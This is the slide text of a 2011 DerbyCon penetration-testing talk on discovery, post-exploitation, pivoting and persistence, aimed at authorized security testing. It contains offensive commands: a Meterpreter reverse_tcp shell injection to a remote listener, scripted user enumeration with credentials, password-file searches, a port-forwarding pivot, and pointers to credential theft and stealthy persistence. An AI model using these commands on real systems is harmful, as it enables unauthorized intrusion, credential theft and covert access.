SlideShare uma empresa Scribd logo
1 de 94
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class DerbyCon 2011
meterpreter> getuid Chris Gates (CG) Twitter carnal0wnage Blog carnal0wnage.attackresearch.com Job Partner/Principal Security Consultant at Lares Affiliations  Attack Research, Metasploit Work Previous Talks Attack Oracle (via web) wXf Web eXploitation Framework Open Source Information Gathering Attacking Oracle (via TNS) Client-Side Attacks
meterpreter> getuid Rob Fuller (mubix) Twitter -> mubix Blog -> http://www.room362.com Job -> Penetration Tester for Rapid7 Previous Talks Networking for Penetration Testers Metasploit Framework/Pro Training for Rapid7 Deep Magic 101  Couch to Career in 80 hours
The setup… We do things You do things There’s a better way to do things* Because ‘they’ do them that way Or… now they will because you are some of ‘they’ Use what you works for you
Domain Admin Or Bust Usually this means adding yourself as one (aka fastest way to get caught) Really just about measuring…
Pentesting Goals What’s our goal? Vulnerability Driven vs. Data Driven vs. Capability Driven pentest/goal What’s a *good* goal? Domain Admin is “A Goal” but it’s a stupid goal. What makes the client money is a better goal (if you* can identify it) Problems arise in actually identifying this. What’s important to testers vs client vs bad guys… Best goal, testing client’s ability to detect & respond to various levels of attackers
Majority of ‘Pentesting’ going on today…
Majority of ‘Pentesting’ going on today… Look I got 500+ shells! And?
Is it working? Who got 0wned? Northrop Grumman: http://www.foxnews.com/scitech/2011/05/31/northrop-grumman-hit-cyber-attack-source-says/ Lockheed Martin: http://packetstormsecurity.org/news/view/19242/March-RSA-Hack-Hits-Lockheed-Remote-Systems- Breached.html L3: http://threatpost.com/en_us/blogs/report-l3-warns-employees-attacks-using-compromised-securid-tokens-060111 Booz Allen Hamilton: http://gizmodo.com/5820049/anonymous-leaks-90000-military-email-accounts-in-latest-antisec-attack SAIC(older): http://www.usatoday.com/news/nation/2007-07-20-saic-security_N.htm
Is it working? Who got 0wned? (recently) DigiNotar: http://www.rijksoverheid.nl/ministeries/bzk/documenten-en-publicaties/rapporten/2011/09/05/diginotar-public-report-version-1.html Texas Police: http://pastebin.com/LGyeLcun Japan Mitsubishi Heavy Industries: http://www.theregister.co.uk/2011/09/22/japan_military_hack_follow_up/ Everyone else (via RSA Employee #15666): http://pastebin.com/yKSQd5Z5 http://hbgary.anonleaks.ch/greg_hbgary_com/26996.html
Is it working? Interaction Time!
A Better way? http://www.secmaniac.com/files/BSides-StrategicPT-Final.pdf
Actual Attack Scenarios
Actual Attack Scenarios (best case)
k, enough fiddle faddle… IT Security Industry is currently focused on minimizing the presence of vulnerabilities Consider a change in focus to what attacker tactics/techniques you can detect and respond to  Let’s call this “Capability Driven Security Assessments”  See my BruCon talk with Joe McCray To do this we need to ramp up post exploitation and stealth
vs
Prepwork
Prep Work Prep work, its awesome, show it some love… Make your click scripts Update your stuff Have script and screen ready to go
How many of you have lost a shell because _your_ connection died?
Screen No, not like drug screen… “Screen is a full-screen window manager that multiplexes a physical terminal between several processes, typically interactive shells.”
Screen Commands and Keyboard Shortcuts screen –S mycustomer CTRL-A then D (Detach) screen –ls screen –x –d mycustomer attaches to ‘mycustomer’ screen  detaches other ‘attached’ sessions CTRL-A :multiuser on (Does not work on Debian based)
How many of you have lost a data because your scrollback wasn’t set to be long enough?
Script No, not like java script… Logs all your stuff Use it user@ubuntu:~$ script clientname.txt Script started, file is clientname.txt user@ubuntu:~$ exit exit Script done, file is clientname.txt user@ubuntu:~$
Discovery
Discovery Finding stuff to lay the smack down on
Quick Tangent Passwords Your passwords suck
Your passwords suck One of these passwords almost always works… OK back to it….
Nmap Scripts Obligatory nod to nmap scripts Best scripts don’t fire off automatically with “-A” Some of the cooler scripts… Citrix, NFS, AFP, SNMP, LDAP awesome Database coverage http* Lots of handy stuff, some overlap with MSF aux but some things aux doesn’t have. Go See Ron’s talk on Sunday
Nmap Scripts (removed citrix-enum-app-xml pic)
Passwords Your passwords suck
Nmap Scripts Oracle http://seclists.org/nmap-dev/2011/q3/546
Nmap Scripts Ldap http://seclists.org/nmap-dev/2011/q3/510
MSF Auxiliary Modules Metasploit Aux modules are awesome Handle all the BS for you Uses lib/rex ==“Ruby EXploitationlibrary” Basic library for most tasks Sockets, protocols, command shell interface SSL, SMB, HTTP, XOR, Base64, random text Intended to be useful outside of the framework Lib/rex ported to a ruby gem! Can make use of rex outside of MSF if so desired
MSF Auxiliary Modules Designed to help with reconnaissance Dozens of useful service scanners Simple module format, easy to use Specify THREADS for concurrency Keep this under 16 for native Windows 256 is fine on Linux Uses RHOSTS instead of RHOST
MSF Auxiliary Modules Uses OptAddressRangeoption class, similar to nmap host specification 192.168.0.1,3,5-7 Standard ranges 192.168.1-7.230 Same IP on multiple subnets 192.168.0.* 0-255 www.metasploit.com/24 0-255 for whatever this resolves to file:/tmp/ranges.txt Line separated list of targets
MSF Auxiliary Modules
MSF Auxiliary Modules
MSF Auxiliary Modules Write your own to solve problems on the fly You should have been in egyp7’s training
Exploitation
Exploitation We seem ok at this already… Considering it covered… Open my email…click that link…you know you want to…k thx bye
POST-Exploitation
Post Exploitation Google Docs http://www.room362.com/blog/2011/9/6/post-exploitation-command-lists.html Or http://bitly.com/qrbKQP Open Source (Anyone can edit them) Will always be public  (might have to lock down the edit privs based on defacement rate)
What is the best persistence method? Meterpreter? HTTPS Pro’s Persistence Agent MOS_DEF? Thunderbird SPAM Persistence DNS, HTTP, HTTPS, etc CORE Agent? Wiz-bang custom binary/backdoor? RAT (probably backdoored in other ways)
Nah… this is better
cat MyPasswords.txt
More on that later…
Hooking your homies up run multi_meter_inject -pt windows/meterpreter/reverse_tcp -mr1.2.3.4 -p 80 Multi-user functionality with armitage/msf pro
Finding Stuff internally
GOOD Nmap Ping Nessus Nexpose Angry IP Scanner? “net view /domain”
BETTER OSQL DSQUERY / DSGET (Annoying) (Joeware) ADFind (less annoying) nltest
BETTER OSQL osql –L Lists all MS SQL servers
BETTER DSQUERY / DSGET (Annoying) dsquery computer -limit 0 current domain dsqueryuser -limit 0  dsquery computer -limit 0 "DC=company,DC=net" dsquery user -limit 0 "DC=company,DC=net“       other domain Or use adfind (joeware)
BETTER nltest Keeps trying to get you info if one path fails
What if CMD.exe is disabled?
But… dropping binaries == bad Damn you forensics people! (On exception binaries that blend in)
BEST Use the underlying API  Railgun Demo Route ARPTable TCPTable
Route
ARPTable No screenie
TCPTable
BEST (Cont’d) Explain NetDiscovery Demo NetDiscovery Highlight SQL, DC, UNIX, Novell selections Explain DomainDiscovery Demo DomainDiscovery
NetDiscovery Demo pic
Quick Tangent Dig  mini NetDiscovery for just one hostname
DomainDiscovery What domains do you have access to? Are they domains? What are the names of all their domain controllers?
USER DISCOVERY
GOOD net group “domain admins” /domain net group “domain admins” /domain:DM net localgroup Administrators net group localgroup Administrators /domain net user domainadmin_username /domain net user username /domain
BETTER Rpcclient Enumerate users #!/bin/bash for i in {500..600} do rpcclient -U “user%Password1" -W DOMAIN 1.2.3.4 -c "lookupsids S-1-5-21-1289870825-1602939633-2792175544-$i done
Passwords Your passwords suck
BEST Explain UserDiscovery Demo UserDiscovery Explain DisplaySessions Demo DisplaySessions PVE-Find-AD-User https://www.corelan.be/index.php/my-free-tools/ad-cs/pve-find-ad-user/
UserDiscovery Sorry no screenie
DisplaySessions
Creating Zombies RunAs ShellExecute, CreateProcessWithLogon, LogonUser WCE + runhash32/64 user level psexec == zombie user & token
DEMO Run executable     in memory
Privilege Escalation Remember, you don’t HAVE to do this phase…
GOOD getsystem Post modules Keyboard layout Bypassuac Core Impact / Canvas ship with locals Honestly a big lacking area for MSF 
getsystem has options, use themor loose shells
BETTER? Explain DomainDrop client.railgun.netapi32.NetUnjoinDomain(nil,nil,nil,nil)
BEST Just ask for it… Explain ‘Ask’ module Looking for the user that has the $stuff Tasklist tasklist /V /S $IP /U $user /P $password for /F "skip=3 delims=" %A in ('net view') do tasklist /V /S %A /U $user /P $password
Just Ask
BEST Just ask for it… Explain ‘Ask’ module Looking for the user that has the $stuff Tasklist tasklist /V /S $IP /U $user /P $password for /F "skip=3 delims=" %A in ('net view') do tasklist /V /S %A /U $user /P $password
Finding the Hope Locating the data that actually matters…
Searching for Gold (Good) Dir /s “My Documents” Dir /s “Desktop” Dir /s *.pcf ListDrives
Searching for Gold (Good) Searching for files 	dir c:password* /s 	dir c:competitor* /s 	dir c:finance* /s 	dir c:risk* /s 	dir c:assessment* /s 	dir c:.key* /s 	dir c:.vsd /s 	dir c:.pcf /s 	dir c:.ica /s dirc:.crt /s 	dir c:.log /s  Search in files findstr /I /N /S /P /C:password * findstr /I /N /S /P /C:secret * findstr /I /N /S /P /C:confidential * findstr /I /N /S /P /C:account * Powershell/WMIC to do it
Searching for Gold (Better) Dumplinks GetFirefoxCreds GetPidginCreds Outlook, IE, Chrome, RDP Password Extraction Basically the whole ‘credentials’ post module section SharePoint Intranet.company.com Shouts to illwill, Kx499, thelightcosine
Searching for Gold (Best) OpenDLP Fiction’s Database Searcher Search in Meterpreter Uses windows indexing i.e. outlook email Dir /s $share > filetosearchoffline.txt Findstr too  Do what works for you…click scripts rule
PIVOTING Kind dumb to stay on the initial point of entry…
Portforwarding Meterpreterportfwd Route Sock4a module + meterpreter session Pro VPN Pivot? Portproxy Built into Windows netsh interface portproxy>add v4tov4 listenport=25 connectaddress=192.168.0.100 connectport=80 protocol=tcp Legitimate Access via VPN, Term Server, Citrix, etc
PERSISTENCE One week isn’t showing impact of internal awareness…
Microsoft has an app for that… Autoruns
These won’t show up there… Smartlocker -> lockout_recorder http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html	 Fxsst.dll https://blog.mandiant.com/archives/1786 http://www.room362.com/blog/2011/6/27/fxsstdll-persistence-the-evil-fax-machine.html Explain gpo_dropperhbgary http://www.hbgary.com/malware-using-local-group-policy Explain IPv6 Dropper http://hak5.org/hack/ipv6-from-the-pentesters-perspective
code on githubsoonishhttps://github.com/mubix/Not-In-Pentesting-Class
Chris Gates carnal0wnage Rob Fuller mubix

Mais conteúdo relacionado

Mais procurados

Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Rob Fuller
 
Incorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>AttackIncorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>Attackjaredhaight
 
20+ ways to bypass your mac os privacy mechanisms
20+ ways to bypass your mac os privacy mechanisms20+ ways to bypass your mac os privacy mechanisms
20+ ways to bypass your mac os privacy mechanismsCsaba Fitzl
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new blackChris Gates
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Rob Fuller
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration TestersNikhil Mittal
 
A @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSA @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSRob Fuller
 
PowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationPowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationWill Schroeder
 
Introducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitIntroducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitjaredhaight
 
Getting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestGetting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestCsaba Fitzl
 
Exploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOSExploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOSCsaba Fitzl
 
Kautilya: Teensy beyond shell
Kautilya: Teensy beyond shellKautilya: Teensy beyond shell
Kautilya: Teensy beyond shellNikhil Mittal
 
Csaba fitzl - Mount(ain) of Bugs
Csaba fitzl - Mount(ain) of BugsCsaba fitzl - Mount(ain) of Bugs
Csaba fitzl - Mount(ain) of BugsCsaba Fitzl
 
NotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersNotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersRob Fuller
 
RIT 2009 Intellectual Pwnership
RIT 2009 Intellectual PwnershipRIT 2009 Intellectual Pwnership
RIT 2009 Intellectual PwnershipRob Fuller
 
Getting root with benign app store apps
Getting root with benign app store appsGetting root with benign app store apps
Getting root with benign app store appsCsaba Fitzl
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, PowershellRoo7break
 

Mais procurados (20)

Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?
 
Incorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>AttackIncorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>Attack
 
20+ ways to bypass your mac os privacy mechanisms
20+ ways to bypass your mac os privacy mechanisms20+ ways to bypass your mac os privacy mechanisms
20+ ways to bypass your mac os privacy mechanisms
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration Testers
 
A @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSA @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNS
 
Wielding a cortana
Wielding a cortanaWielding a cortana
Wielding a cortana
 
PowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationPowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege Escalation
 
Pwnstaller
PwnstallerPwnstaller
Pwnstaller
 
Introducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitIntroducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkit
 
Getting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestGetting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfest
 
Exploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOSExploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOS
 
Kautilya: Teensy beyond shell
Kautilya: Teensy beyond shellKautilya: Teensy beyond shell
Kautilya: Teensy beyond shell
 
Csaba fitzl - Mount(ain) of Bugs
Csaba fitzl - Mount(ain) of BugsCsaba fitzl - Mount(ain) of Bugs
Csaba fitzl - Mount(ain) of Bugs
 
NotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersNotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for Pentesters
 
RIT 2009 Intellectual Pwnership
RIT 2009 Intellectual PwnershipRIT 2009 Intellectual Pwnership
RIT 2009 Intellectual Pwnership
 
Getting root with benign app store apps
Getting root with benign app store appsGetting root with benign app store apps
Getting root with benign app store apps
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, Powershell
 

Semelhante a The Dirty Little Secrets They Didn’t Teach You In Pentesting Class

The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class Chris Gates
 
PowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidPowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidMatthew Johnson
 
XP Days 2019: First secret delivery for modern cloud-native applications
XP Days 2019: First secret delivery for modern cloud-native applicationsXP Days 2019: First secret delivery for modern cloud-native applications
XP Days 2019: First secret delivery for modern cloud-native applicationsVlad Fedosov
 
Clustered PHP - DC PHP 2009
Clustered PHP - DC PHP 2009Clustered PHP - DC PHP 2009
Clustered PHP - DC PHP 2009marcelesser
 
The "Holy Grail" of Dev/Ops
The "Holy Grail" of Dev/OpsThe "Holy Grail" of Dev/Ops
The "Holy Grail" of Dev/OpsErik Osterman
 
Puppet for SysAdmins
Puppet for SysAdminsPuppet for SysAdmins
Puppet for SysAdminsPuppet
 
Debugging performance issues, memory issues and crashes in .net applications rev
Debugging performance issues, memory issues and crashes in .net applications revDebugging performance issues, memory issues and crashes in .net applications rev
Debugging performance issues, memory issues and crashes in .net applications revTess Ferrandez
 
Step by Step on How to Setup DarkComet
Step by Step on How to Setup DarkCometStep by Step on How to Setup DarkComet
Step by Step on How to Setup DarkCometPich Pra Tna
 
Ultimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPUltimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPPich Pra Tna
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]RootedCON
 
Puppet for Sys Admins
Puppet for Sys AdminsPuppet for Sys Admins
Puppet for Sys AdminsPuppet
 
(SACON) Sudarshan Pisupati & Sahir Hidayatullah - active deception sacon
(SACON) Sudarshan Pisupati & Sahir Hidayatullah - active deception sacon(SACON) Sudarshan Pisupati & Sahir Hidayatullah - active deception sacon
(SACON) Sudarshan Pisupati & Sahir Hidayatullah - active deception saconPriyanka Aash
 
No Hugging, No Learning
No Hugging, No LearningNo Hugging, No Learning
No Hugging, No LearningOlaf Alders
 
Symfony finally swiped right on envvars
Symfony finally swiped right on envvarsSymfony finally swiped right on envvars
Symfony finally swiped right on envvarsSam Marley-Jarrett
 
How to Build a Pure Evil Magento Module
How to Build a Pure Evil Magento ModuleHow to Build a Pure Evil Magento Module
How to Build a Pure Evil Magento ModuleAOE
 

Semelhante a The Dirty Little Secrets They Didn’t Teach You In Pentesting Class (20)

The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
PowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidPowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue Kid
 
Bettercap
BettercapBettercap
Bettercap
 
XP Days 2019: First secret delivery for modern cloud-native applications
XP Days 2019: First secret delivery for modern cloud-native applicationsXP Days 2019: First secret delivery for modern cloud-native applications
XP Days 2019: First secret delivery for modern cloud-native applications
 
All of Javascript
All of JavascriptAll of Javascript
All of Javascript
 
Clustered PHP - DC PHP 2009
Clustered PHP - DC PHP 2009Clustered PHP - DC PHP 2009
Clustered PHP - DC PHP 2009
 
The "Holy Grail" of Dev/Ops
The "Holy Grail" of Dev/OpsThe "Holy Grail" of Dev/Ops
The "Holy Grail" of Dev/Ops
 
Puppet for SysAdmins
Puppet for SysAdminsPuppet for SysAdmins
Puppet for SysAdmins
 
Debugging performance issues, memory issues and crashes in .net applications rev
Debugging performance issues, memory issues and crashes in .net applications revDebugging performance issues, memory issues and crashes in .net applications rev
Debugging performance issues, memory issues and crashes in .net applications rev
 
Step by Step on How to Setup DarkComet
Step by Step on How to Setup DarkCometStep by Step on How to Setup DarkComet
Step by Step on How to Setup DarkComet
 
Ultimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPUltimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIP
 
All of javascript
All of javascriptAll of javascript
All of javascript
 
Us 17-krug-hacking-severless-runtimes
Us 17-krug-hacking-severless-runtimesUs 17-krug-hacking-severless-runtimes
Us 17-krug-hacking-severless-runtimes
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]
 
Puppet for Sys Admins
Puppet for Sys AdminsPuppet for Sys Admins
Puppet for Sys Admins
 
(SACON) Sudarshan Pisupati & Sahir Hidayatullah - active deception sacon
(SACON) Sudarshan Pisupati & Sahir Hidayatullah - active deception sacon(SACON) Sudarshan Pisupati & Sahir Hidayatullah - active deception sacon
(SACON) Sudarshan Pisupati & Sahir Hidayatullah - active deception sacon
 
No Hugging, No Learning
No Hugging, No LearningNo Hugging, No Learning
No Hugging, No Learning
 
Symfony finally swiped right on envvars
Symfony finally swiped right on envvarsSymfony finally swiped right on envvars
Symfony finally swiped right on envvars
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 
How to Build a Pure Evil Magento Module
How to Build a Pure Evil Magento ModuleHow to Build a Pure Evil Magento Module
How to Build a Pure Evil Magento Module
 

Mais de Rob Fuller

KiwiCon 2016 - Kicking Orion's Assets
KiwiCon 2016 - Kicking Orion's AssetsKiwiCon 2016 - Kicking Orion's Assets
KiwiCon 2016 - Kicking Orion's AssetsRob Fuller
 
As The Phish Turns
As The Phish TurnsAs The Phish Turns
As The Phish TurnsRob Fuller
 
Practical Exploitation - Webappy Style
Practical Exploitation - Webappy StylePractical Exploitation - Webappy Style
Practical Exploitation - Webappy StyleRob Fuller
 
Intro to White Chapel
Intro to White ChapelIntro to White Chapel
Intro to White ChapelRob Fuller
 
Memory Forensics for Pentesters: Firefox
Memory Forensics for Pentesters: FirefoxMemory Forensics for Pentesters: Firefox
Memory Forensics for Pentesters: FirefoxRob Fuller
 
From Couch To Career In 80 Hours
From Couch To Career In 80 HoursFrom Couch To Career In 80 Hours
From Couch To Career In 80 HoursRob Fuller
 

Mais de Rob Fuller (7)

KiwiCon 2016 - Kicking Orion's Assets
KiwiCon 2016 - Kicking Orion's AssetsKiwiCon 2016 - Kicking Orion's Assets
KiwiCon 2016 - Kicking Orion's Assets
 
GiTFO
GiTFOGiTFO
GiTFO
 
As The Phish Turns
As The Phish TurnsAs The Phish Turns
As The Phish Turns
 
Practical Exploitation - Webappy Style
Practical Exploitation - Webappy StylePractical Exploitation - Webappy Style
Practical Exploitation - Webappy Style
 
Intro to White Chapel
Intro to White ChapelIntro to White Chapel
Intro to White Chapel
 
Memory Forensics for Pentesters: Firefox
Memory Forensics for Pentesters: FirefoxMemory Forensics for Pentesters: Firefox
Memory Forensics for Pentesters: Firefox
 
From Couch To Career In 80 Hours
From Couch To Career In 80 HoursFrom Couch To Career In 80 Hours
From Couch To Career In 80 Hours
 

Último

Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfSeasiaInfotech2
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 

Último (20)

Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
Are Multi-Cloud and Serverless Good or Bad?
